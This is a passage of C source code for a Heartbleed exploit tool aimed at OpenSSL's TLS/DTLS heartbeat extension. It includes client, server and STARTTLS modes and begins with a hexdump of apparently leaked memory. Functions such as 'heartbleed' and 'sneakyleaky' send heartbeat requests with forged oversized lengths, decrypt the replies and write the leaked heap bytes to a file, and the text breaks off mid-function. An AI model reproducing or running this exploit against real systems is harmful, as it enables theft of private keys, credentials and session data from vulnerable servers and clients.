|.~..kB.h2.e....\"| \n* 00000330 e3 cc 62 97 e4 fa 64 0b 1e 70 bf e5 a2 40 e4 49 |..b...d..p...@.I| \n* 00000340 24 f9 05 3f 2e fe 7c 38 56 39 4d bd 51 63 0d 79 |$..?..|8V9M.Qc.y| \n* 00000350 85 c0 4b 1a 46 64 e0 fe a8 87 bf c7 4d 21 cb 79 |..K.Fd......M!.y| \n* 00000360 37 e7 a6 e3 6c 3b ed 35 17 73 7a 71 c6 72 2f bb |7...l;.5.szq.r/.| \n* 00000370 58 dc ef e9 1e a3 89 5e 70 cd 95 10 87 c1 8a 7e |X......^p......~| \n* 00000380 e7 51 c2 22 67 66 ee 22 f9 a5 2e 31 f2 ad fc 3b |.Q.\"gf.\"...1...;| \n* 00000390 98 c8 30 63 ef 74 b5 4e c4 bd c7 a2 46 0a b8 bf |..0c.t.N....F...| \n* 000003a0 df a8 54 0e 4f 37 d0 a5 27 a3 f3 a7 28 38 3f 16 |..T.O7..'...(8?.| \n* 000003b0 fe ff 00 00 00 00 00 00 00 02 00 0c 0e 00 00 00 |................| \n* 000003c0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| \n* 000003d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| \n* * \n* 00000530 00 00 00 00 00 00 00 00 82 8f be ff cf 26 12 9d |.............&..| \n* 00000540 a2 de 0c 44 21 4a 54 be 41 4c df |...D!JT.AL.| \n* 0000054b \n* \n*/ \n#include <stdio.h> \n#include <stdint.h> \n#include <stdlib.h> \n#include <string.h> \n#include <unistd.h> \n#include <getopt.h> \n#include <signal.h> \n#include <netdb.h> \n#include <fcntl.h> \n#include <errno.h> \n#include <sys/socket.h> \n#include <sys/types.h> \n#include <netinet/in.h> \n#include <inttypes.h> \n#include <openssl/bio.h> \n#include <openssl/ssl.h> \n#include <openssl/err.h> \n#include <openssl/evp.h> \n#include <openssl/tls1.h> \n#include <openssl/rand.h> \n#include <openssl/buffer.h> \n \n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\ \n(((unsigned int)(c[1])) )),c+=2) \n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\ \nc[1]=(unsigned char)(((s) )&0xff)),c+=2) \n \nint first = 0; \nint leakbytes = 0; \nint repeat = 1; \nint badpackets = 0; \n \ntypedef struct { \nint socket; \nSSL *sslHandle; \nSSL_CTX *sslContext; \n} connection; \n \ntypedef struct { \nunsigned char type; \nshort version; \nunsigned int length; \nunsigned char hbtype; \nunsigned int payload_length; \nvoid* payload; \n} heartbeat; \n \nvoid ssl_init(); \nvoid usage(); \nint tcp_connect(char*,int); \nint tcp_bind(char*, int); \nconnection* tls_connect(int); \nconnection* tls_bind(int); \nint pre_cmd(int,int,int); \nvoid* heartbleed(connection* ,unsigned int); \nvoid* sneakyleaky(connection* ,char*, int); \n \nstatic DTLS1_BITMAP *dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch); \nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap); \nstatic int dtls1_buffer_record(SSL *s, record_pqueue *q, unsigned char *priority); \nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap); \n \nint tcp_connect(char* server,int port){ \nint sd,ret; \nstruct hostent *host; \nstruct sockaddr_in sa; \nhost = gethostbyname(server); \nsd = socket(AF_INET, SOCK_STREAM, 0); \nif(sd==-1){ \nprintf(\"[!] cannot create socket\\n\"); \nexit(0); \n} \nsa.sin_family = AF_INET; \nsa.sin_port = htons(port); \nsa.sin_addr = *((struct in_addr *) host->h_addr); \nbzero(&(sa.sin_zero),8); \nprintf(\"[ connecting to %s %d/tcp\\n\",server,port); \nret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr)); \nif(ret==0){ \nprintf(\"[ connected to %s %d/tcp\\n\",server,port); \n} \nelse{ \nprintf(\"[!] FATAL: could not connect to %s %d/tcp\\n\",server,port); \nexit(0); \n} \nreturn sd; \n} \n \nint tcp_bind(char* server, int port){ \nint sd, ret, val=1; \nstruct sockaddr_in sin; \nstruct hostent *host; \nhost = gethostbyname(server); \nsd=socket(AF_INET,SOCK_STREAM,0); \nif(sd==-1){ \nprintf(\"[!] cannot create socket\\n\"); \nexit(0); \n} \nmemset(&sin,0,sizeof(sin)); \nsin.sin_addr=*((struct in_addr *) host->h_addr); \nsin.sin_family=AF_INET; \nsin.sin_port=htons(port); \nsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val)); \nret = bind(sd,(struct sockaddr *)&sin,sizeof(sin)); \nif(ret==-1){ \nprintf(\"[!] cannot bind socket\\n\"); \nexit(0); \n} \nlisten(sd,5); \nreturn(sd); \n} \n \nconnection* dtls_server(int sd, char* server,int port){ \nint bytes; \nconnection *c; \nchar* buf; \nbuf = malloc(4096); \nint ret; \nstruct hostent *host; \nstruct sockaddr_in sa; \nunsigned long addr; \nif ((host = gethostbyname(server)) == NULL) { \nperror(\"gethostbyname\"); \nexit(1); \n} \nsd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); \nif(sd==-1){ \nprintf(\"[!] cannot create socket\\n\"); \nexit(0); \n} \nsa.sin_family = AF_INET; \nsa.sin_port = htons(port); \nsa.sin_addr = *((struct in_addr *) host->h_addr); \nif (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) { \nperror(\"bind()\"); \nexit(1); \n} \n \nBIO *bio; \nif(c==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nif(buf==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nmemset(buf,0,4096); \nc = malloc(sizeof(connection)); \nif(c==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nc->socket = sd; \nc->sslHandle = NULL; \nc->sslContext = NULL; \nc->sslContext = SSL_CTX_new(DTLSv1_server_method()); \nSSL_CTX_set_read_ahead (c->sslContext, 1); \nif(c->sslContext==NULL) \nERR_print_errors_fp(stderr); \nSSL_CTX_SRP_CTX_init(c->sslContext); \nSSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM); \nSSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \nif(!SSL_CTX_check_private_key(c->sslContext)){ \nprintf(\"[!] FATAL: private key does not match the certificate public key\\n\"); \nexit(0); \n} \nc->sslHandle = SSL_new(c->sslContext); \nif(c->sslHandle==NULL) \nERR_print_errors_fp(stderr); \nif(!SSL_set_fd(c->sslHandle,c->socket)) \nERR_print_errors_fp(stderr); \nbio = BIO_new_dgram(sd, BIO_NOCLOSE); \n \nSSL_set_bio(c->sslHandle, bio, bio); \nSSL_set_accept_state (c->sslHandle); \n \nint rc = SSL_accept(c->sslHandle); \nprintf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle)); \n// bytes = SSL_read(c->sslHandle, buf, 4095); \n// printf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf); \nif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || \nc->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){ \nprintf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\"); \n} \nreturn c; \n} \n \nvoid ssl_init(){ \nSSL_load_error_strings(); \nSSL_library_init(); \nOpenSSL_add_all_digests(); \nOpenSSL_add_all_algorithms(); \nOpenSSL_add_all_ciphers(); \n} \n \nconnection* tls_connect(int sd){ \nconnection *c; \nc = malloc(sizeof(connection)); \nif(c==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nc->socket = sd; \nc->sslHandle = NULL; \nc->sslContext = NULL; \nc->sslContext = SSL_CTX_new(SSLv23_client_method()); \nSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3); \nif(c->sslContext==NULL) \nERR_print_errors_fp(stderr); \nc->sslHandle = SSL_new(c->sslContext); \nif(c->sslHandle==NULL) \nERR_print_errors_fp(stderr); \nif(!SSL_set_fd(c->sslHandle,c->socket)) \nERR_print_errors_fp(stderr); \nif(SSL_connect(c->sslHandle)!=1) \nERR_print_errors_fp(stderr); \nif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || \nc->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){ \nprintf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\"); \n} \nreturn c; \n} \n \nconnection* dtls_client(int sd, char* server,int port){ \nint ret; \nstruct hostent *host; \nstruct sockaddr_in sa; \nconnection *c; \nmemset((char *)&sa,0,sizeof(sa)); \nc = malloc(sizeof(connection)); \nif ((host = gethostbyname(server)) == NULL) { \nperror(\"gethostbyname\"); \nexit(1); \n} \nsd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); \nif(sd==-1){ \nprintf(\"[!] cannot create socket\\n\"); \nexit(0); \n} \nsa.sin_family = AF_INET; \nsa.sin_port = htons(port); \nsa.sin_addr = *((struct in_addr *) host->h_addr); \nif (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) { \nperror(\"connect()\"); \nexit(0); \n} \n \nBIO *bio; \nif(c==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \n \nc->sslContext = NULL; \nc->sslContext = SSL_CTX_new(DTLSv1_client_method()); \nSSL_CTX_set_read_ahead (c->sslContext, 1); \nif(c->sslContext==NULL) \nERR_print_errors_fp(stderr); \nif(c->sslHandle==NULL) \nERR_print_errors_fp(stderr); \n \nc->socket = sd; \nc->sslHandle = NULL; \nc->sslHandle = SSL_new(c->sslContext); \nSSL_set_tlsext_host_name(c->sslHandle,server); \nbio = BIO_new_dgram(sd, BIO_NOCLOSE); \n \nBIO_ctrl_set_connected(bio, 1, &sa); \nSSL_set_bio(c->sslHandle, bio, bio); \nSSL_set_connect_state (c->sslHandle); \n//printf(\"eshta\\n\"); \nif(SSL_connect(c->sslHandle)!=1) \nERR_print_errors_fp(stderr); \n \nif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || \nc->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){ \nprintf(\"[ warning: heartbeat extension is unsupported (try anyway), %d \\n\",c->sslHandle->tlsext_heartbeat); \n} \nreturn c; \n} \n \nconnection* tls_bind(int sd){ \nint bytes; \nconnection *c; \nchar* buf; \nbuf = malloc(4096); \nif(buf==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nmemset(buf,0,4096); \nc = malloc(sizeof(connection)); \nif(c==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nc->socket = sd; \nc->sslHandle = NULL; \nc->sslContext = NULL; \nc->sslContext = SSL_CTX_new(SSLv23_server_method()); \nif(c->sslContext==NULL) \nERR_print_errors_fp(stderr); \nSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3); \nSSL_CTX_SRP_CTX_init(c->sslContext); \nSSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM); \nSSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \nif(!SSL_CTX_check_private_key(c->sslContext)){ \nprintf(\"[!] FATAL: private key does not match the certificate public key\\n\"); \nexit(0); \n} \nc->sslHandle = SSL_new(c->sslContext); \nif(c->sslHandle==NULL) \nERR_print_errors_fp(stderr); \nif(!SSL_set_fd(c->sslHandle,c->socket)) \nERR_print_errors_fp(stderr); \nint rc = SSL_accept(c->sslHandle); \nprintf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle)); \nbytes = SSL_read(c->sslHandle, buf, 4095); \nprintf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf); \nif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || \nc->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){ \nprintf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\"); \n} \nreturn c; \n} \n \nint pre_cmd(int sd,int precmd,int verbose){ \n/* this function can be used to send commands to a plain-text \nservice or client before heartbleed exploit attempt. e.g. STARTTLS */ \nint rc, go = 0; \nchar* buffer; \nchar* line1; \nchar* line2; \nswitch(precmd){ \ncase 0: \nline1 = \"EHLO test\\n\"; \nline2 = \"STARTTLS\\n\"; \nbreak; \ncase 1: \nline1 = \"CAPA\\n\"; \nline2 = \"STLS\\n\"; \nbreak; \ncase 2: \nline1 = \"a001 CAPB\\n\"; \nline2 = \"a002 STARTTLS\\n\"; \nbreak; \ndefault: \ngo = 1; \nbreak; \n} \nif(go==0){ \nbuffer = malloc(2049); \nif(buffer==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nmemset(buffer,0,2049); \nrc = read(sd,buffer,2048); \nprintf(\"[ banner: %s\",buffer); \nsend(sd,line1,strlen(line1),0); \nmemset(buffer,0,2049); \nrc = read(sd,buffer,2048); \nif(verbose==1){ \nprintf(\"%s\\n\",buffer); \n} \nsend(sd,line2,strlen(line2),0); \nmemset(buffer,0,2049); \nrc = read(sd,buffer,2048); \nif(verbose==1){ \nprintf(\"%s\\n\",buffer); \n} \n} \nreturn sd; \n} \n \nvoid* heartbleed(connection *c,unsigned int type){ \nunsigned char *buf, *p; \nint ret; \nbuf = OPENSSL_malloc(1 + 2); \nif(buf==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \np = buf; \n*p++ = TLS1_HB_REQUEST; \nswitch(type){ \ncase 0: \ns2n(0x0,p); \nbreak; \ncase 1: \ns2n(0xffff,p); \nbreak; \ndefault: \nprintf(\"[ setting heartbeat payload_length to %u\\n\",type); \ns2n(type,p); \nbreak; \n} \nprintf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\"); \nret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3); \nOPENSSL_free(buf); \nreturn c; \n} \n \nvoid* dtlsheartbleed(connection *c,unsigned int type){ \n \nunsigned char *buf, *p; \nint ret; \nbuf = OPENSSL_malloc(1 + 2 + 16); \nmemset(buf, '\\0', sizeof buf); \nif(buf==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \np = buf; \n*p++ = TLS1_HB_REQUEST; \nswitch(type){ \ncase 0: \ns2n(0x0,p); \nbreak; \ncase 1: \n// s2n(0xffff,p); \n// s2n(0x3feb,p); \ns2n(0x0538,p); \nbreak; \ndefault: \nprintf(\"[ setting heartbeat payload_length to %u\\n\",type); \ns2n(type,p); \nbreak; \n} \ns2n(c->sslHandle->tlsext_hb_seq, p); \nprintf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\"); \n \nret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16); \n \nif (ret >= 0) \n{ \nif (c->sslHandle->msg_callback) \nc->sslHandle->msg_callback(1, c->sslHandle->version, TLS1_RT_HEARTBEAT, \nbuf, 3 + 16, \nc->sslHandle, c->sslHandle->msg_callback_arg); \n \ndtls1_start_timer(c->sslHandle); \nc->sslHandle->tlsext_hb_pending = 1; \n} \n \nOPENSSL_free(buf); \n \nreturn c; \n} \n \nvoid* sneakyleaky(connection *c,char* filename, int verbose){ \nchar *p; \nint ssl_major,ssl_minor,al; \nint enc_err,n,i; \nSSL3_RECORD *rr; \nSSL_SESSION *sess; \nSSL* s; \nunsigned char md[EVP_MAX_MD_SIZE]; \nshort version; \nunsigned mac_size, orig_len; \nsize_t extra; \nrr= &(c->sslHandle->s3->rrec); \nsess=c->sslHandle->session; \ns = c->sslHandle; \nif (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER) \nextra=SSL3_RT_MAX_EXTRA; \nelse \nextra=0; \nif ((s->rstate != SSL_ST_READ_BODY) || \n(s->packet_length < SSL3_RT_HEADER_LENGTH)) { \nn=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0); \nif (n <= 0) \ngoto apple; \ns->rstate=SSL_ST_READ_BODY; \np=s->packet; \nrr->type= *(p++); \nssl_major= *(p++); \nssl_minor= *(p++); \nversion=(ssl_major<<8)|ssl_minor; \nn2s(p,rr->length); \nif(rr->type==24){ \nprintf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length); \nif(rr->length > 16834){ \nprintf(\"[ error: got a malformed TLS length.\\n\"); \nexit(0); \n} \n} \nelse{ \nprintf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length); \ns->packet_length=0; \nbadpackets++; \nif(badpackets > 3){ \nprintf(\"[ error: too many bad packets recieved\\n\"); \nexit(0); \n} \ngoto apple; \n} \n} \nif (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){ \ni=rr->length; \nn=ssl3_read_n(s,i,i,1); \nif (n <= 0) goto apple; \n} \nprintf(\"[ decrypting SSL packet\\n\"); \ns->rstate=SSL_ST_READ_HEADER; \nrr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]); \nrr->data=rr->input; \ntls1_enc(s,0); \nif((sess != NULL) && \n(s->enc_read_ctx != NULL) && \n(EVP_MD_CTX_md(s->read_hash) != NULL)) \n{ \nunsigned char *mac = NULL; \nunsigned char mac_tmp[EVP_MAX_MD_SIZE]; \nmac_size=EVP_MD_CTX_size(s->read_hash); \nOPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE); \norig_len = rr->length+((unsigned int)rr->type>>8); \nif(orig_len < mac_size || \n(EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE && \norig_len < mac_size+1)){ \nal=SSL_AD_DECODE_ERROR; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT); \n} \nif (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){ \nmac = mac_tmp; \nssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len); \nrr->length -= mac_size; \n} \nelse{ \nrr->length -= mac_size; \nmac = &rr->data[rr->length]; \n} \ni = tls1_mac(s,md,0); \nif (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0) \nenc_err = -1; \nif (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size) \nenc_err = -1; \n} \nif(enc_err < 0){ \nal=SSL_AD_BAD_RECORD_MAC; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC); \ngoto apple; \n} \nif(s->expand != NULL){ \nif (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) { \nal=SSL_AD_RECORD_OVERFLOW; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG); \ngoto apple; \n} \nif (!ssl3_do_uncompress(s)) { \nal=SSL_AD_DECOMPRESSION_FAILURE; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION); \ngoto apple; \n} \n} \nif (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) { \nal=SSL_AD_RECORD_OVERFLOW; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG); \ngoto apple; \n} \nrr->off=0; \ns->packet_length=0; \nif(first==0){ \nuint heartbleed_len = 0; \nchar* fp = s->s3->rrec.data; \n(long)fp++; \nmemcpy(&heartbleed_len,fp,2); \nheartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8; \nfirst = 2; \nleakbytes = heartbleed_len + 16; \nprintf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len); \n} \nif(verbose==1){ \n{ unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); } \nprintf(\"\\n\"); \n} \nleakbytes-=rr->length; \nif(leakbytes > 0){ \nrepeat = 1; \n} \nelse{ \nrepeat = 0; \n} \nprintf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length); \nint output = s->s3->rrec.length-3; \nif(output > 0){ \nint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700); \nif(first==2){ \nfirst--; \nwrite(fd,s->s3->rrec.data+3,s->s3->rrec.length); \n/* first three bytes are resp+len */ \nprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename); \n} \nelse{ \n/* heap data & 16 bytes padding */ \nwrite(fd,s->s3->rrec.data+3,s->s3->rrec.length); \nprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename); \n} \nclose(fd); \n} \nelse{ \nprintf(\"[ nothing from the heap to write\\n\"); \n} \nreturn; \napple: \nprintf(\"[ problem handling SSL record packet - wrong type?\\n\"); \nbadpackets++; \nif(badpackets > 3){ \nprintf(\"[ error: too many bad packets recieved\\n\"); \nexit(0); \n} \nreturn; \n} \n \n \nvoid* dtlssneakyleaky(connection *c,char* filename, int verbose){ \nchar *p; \nint ssl_major,ssl_minor,al; \nint enc_err,n,i; \nSSL3_RECORD *rr; \nSSL_SESSION *sess; \nSSL* s; \nDTLS1_BITMAP *bitmap; \nunsigned int is_next_epoch; \nunsigned char md[EVP_MAX_MD_SIZE]; \nshort version; \nunsigned int mac_size, orig_len; \n \nrr= &(c->sslHandle->s3->rrec); \nsess=c->sslHandle->session; \ns = c->sslHandle; \n \nagain: \nif ((s->rstate != SSL_ST_READ_BODY) || \n(s->packet_length < DTLS1_RT_HEADER_LENGTH)) { \nn=ssl3_read_n(s, DTLS1_RT_HEADER_LENGTH, s->s3->rbuf.len, 0); \nif (n <= 0) \ngoto apple; \n \ns->rstate=SSL_ST_READ_BODY; \np=s->packet; \nrr->type= *(p++); \nssl_major= *(p++); \nssl_minor= *(p++); \nversion=(ssl_major<<8)|ssl_minor; \nn2s(p,rr->epoch); \nmemcpy(&(s->s3->read_sequence[2]), p, 6); \np+=6; \nn2s(p,rr->length); \nif(rr->type==24){ \nprintf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length); \nif(rr->length > 16834){ \nprintf(\"[ error: got a malformed TLS length.\\n\"); \nexit(0); \n} \n} \nelse{ \nprintf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length); \ns->packet_length=0; \nbadpackets++; \nif(badpackets > 3){ \nprintf(\"[ error: too many bad packets recieved\\n\"); \nexit(0); \n} \ngoto apple; \n} \n} \n \nif (rr->length > s->packet_length-DTLS1_RT_HEADER_LENGTH){ \ni=rr->length; \nn=ssl3_read_n(s,i,i,1); \nif (n <= 0) goto apple; \n} \nif ( n != i) \n{ \nrr->length = 0; \ns->packet_length = 0; \ngoto again; \n} \nprintf(\"[ decrypting SSL packet\\n\"); \ns->rstate=SSL_ST_READ_HEADER; \n \nbitmap = dtls1_get_bitmap(s, rr, &is_next_epoch); \nif ( bitmap == NULL) \n{ \nrr->length = 0; \ns->packet_length = 0; \ngoto again; \n} \n \nif (!(s->d1->listen && rr->type == SSL3_RT_HANDSHAKE && \n*p == SSL3_MT_CLIENT_HELLO) && \n!dtls1_record_replay_check(s, bitmap)) \n{ \nrr->length = 0; \ns->packet_length=0; \ngoto again; \n} \n \nif (rr->length == 0) goto again; \nif (is_next_epoch) \n{ \nif ((SSL_in_init(s) || s->in_handshake) && !s->d1->listen) \n{ \ndtls1_buffer_record(s, &(s->d1->unprocessed_rcds), rr->seq_num); \n} \nrr->length = 0; \ns->packet_length = 0; \ngoto again; \n} \n \n \nrr->input= &(s->packet[DTLS1_RT_HEADER_LENGTH]); \nrr->data=rr->input; \norig_len=rr->length; \n \ndtls1_enc(s,0); \n \nif((sess != NULL) && \n(s->enc_read_ctx != NULL) && \n(EVP_MD_CTX_md(s->read_hash) != NULL)) \n{ \nunsigned char *mac = NULL; \nunsigned char mac_tmp[EVP_MAX_MD_SIZE]; \nmac_size=EVP_MD_CTX_size(s->read_hash); \nOPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE); \norig_len = rr->length+((unsigned int)rr->type>>8); \nif(orig_len < mac_size || \n(EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE && \norig_len < mac_size+1)){ \nal=SSL_AD_DECODE_ERROR; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT); \n} \nif (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){ \nmac = mac_tmp; \nssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len); \nrr->length -= mac_size; \n} \nelse{ \nrr->length -= mac_size; \nmac = &rr->data[rr->length]; \n} \ni = tls1_mac(s,md,0); \n \nif (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0) \nenc_err = -1; \n \nif (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+mac_size) \nenc_err = -1; \n} \nif(enc_err < 0){ \nal=SSL_AD_BAD_RECORD_MAC; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC); \ngoto apple; \n} \nif(s->expand != NULL){ \nif (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH) { \nal=SSL_AD_RECORD_OVERFLOW; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG); \ngoto apple; \n} \nif (!ssl3_do_uncompress(s)) { \nal=SSL_AD_DECOMPRESSION_FAILURE; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION); \ngoto apple; \n} \n} \n \nif (rr->length > SSL3_RT_MAX_PLAIN_LENGTH) { \nal=SSL_AD_RECORD_OVERFLOW; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG); \ngoto apple; \n} \nrr->off=0; \ns->packet_length=0; \ndtls1_record_bitmap_update(s, &(s->d1->bitmap)); \nif(first==0){ \nuint heartbleed_len = 0; \nchar* fp = s->s3->rrec.data; \n(long)fp++; \nmemcpy(&heartbleed_len,fp,2); \nheartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8; \nfirst = 2; \nleakbytes = heartbleed_len + 16; \nprintf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len); \n} \nif(verbose==1){ \n{ unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); } \nprintf(\"\\n\"); \n} \nleakbytes-=rr->length; \nif(leakbytes > 0){ \nrepeat = 1; \n} \nelse{ \nrepeat = 0; \n} \nprintf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length); \nint output = s->s3->rrec.length-3; \nif(output > 0){ \nint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700); \nif(first==2){ \nfirst--; \nwrite(fd,s->s3->rrec.data+3,s->s3->rrec.length); \n/* first three bytes are resp+len */ \nprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename); \n} \nelse{ \n/* heap data & 16 bytes padding */ \nwrite(fd,s->s3->rrec.data+3,s->s3->rrec.length); \nprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename); \n} \nclose(fd); \n} \nelse{ \nprintf(\"[ nothing from the heap to write\\n\"); \n} \n \ndtls1_stop_timer(c->sslHandle); \nc->sslHandle->tlsext_hb_seq++; \nc->sslHandle->tlsext_hb_pending = 0; \n \nreturn; \napple: \nprintf(\"[ problem handling SSL record packet - wrong type?\\n\"); \nbadpackets++; \nif(badpackets > 3){ \nprintf(\"[ error: too many bad packets recieved\\n\"); \nexit(0); \n} \nreturn; \n} \n \nstatic DTLS1_BITMAP * \ndtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch) \n{ \n \n*is_next_epoch = 0; \n \nif (rr->epoch == s->d1->r_epoch) \nreturn &s->d1->bitmap; \n \nelse if (rr->epoch == (unsigned long)(s->d1->r_epoch + 1) && \n(rr->type == SSL3_RT_HANDSHAKE || \nrr->type == SSL3_RT_ALERT)) \n{ \n*is_next_epoch = 1; \nreturn &s->d1->next_bitmap; \n} \n \nreturn NULL; \n} \n \nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap) \n{ \nint cmp; \nunsigned int shift; \nconst unsigned char *seq = s->s3->read_sequence; \n \ncmp = satsub64be(seq,bitmap->max_seq_num); \nif (cmp > 0) \n{ \nmemcpy (s->s3->rrec.seq_num,seq,8); \nreturn 1; \n} \nshift = -cmp; \nif (shift >= sizeof(bitmap->map)*8) \nreturn 0; \nelse if (bitmap->map & (1UL<<shift)) \nreturn 0; \n \nmemcpy (s->s3->rrec.seq_num,seq,8); \nreturn 1; \n} \n \nint satsub64be(const unsigned char *v1,const unsigned char *v2) \n{ int ret,sat,brw,i; \n \nif (sizeof(long) == 8) do \n{ const union { long one; char little; } is_endian = {1}; \nlong l; \n \nif (is_endian.little) break; \n \nif (((size_t)v1|(size_t)v2)&0x7) break; \n \nl = *((long *)v1); \nl -= *((long *)v2); \nif (l>128) return 128; \nelse if (l<-128) return -128; \nelse return (int)l; \n} while (0); \n \nret = (int)v1[7]-(int)v2[7]; \nsat = 0; \nbrw = ret>>8; \nif (ret & 0x80) \n{ for 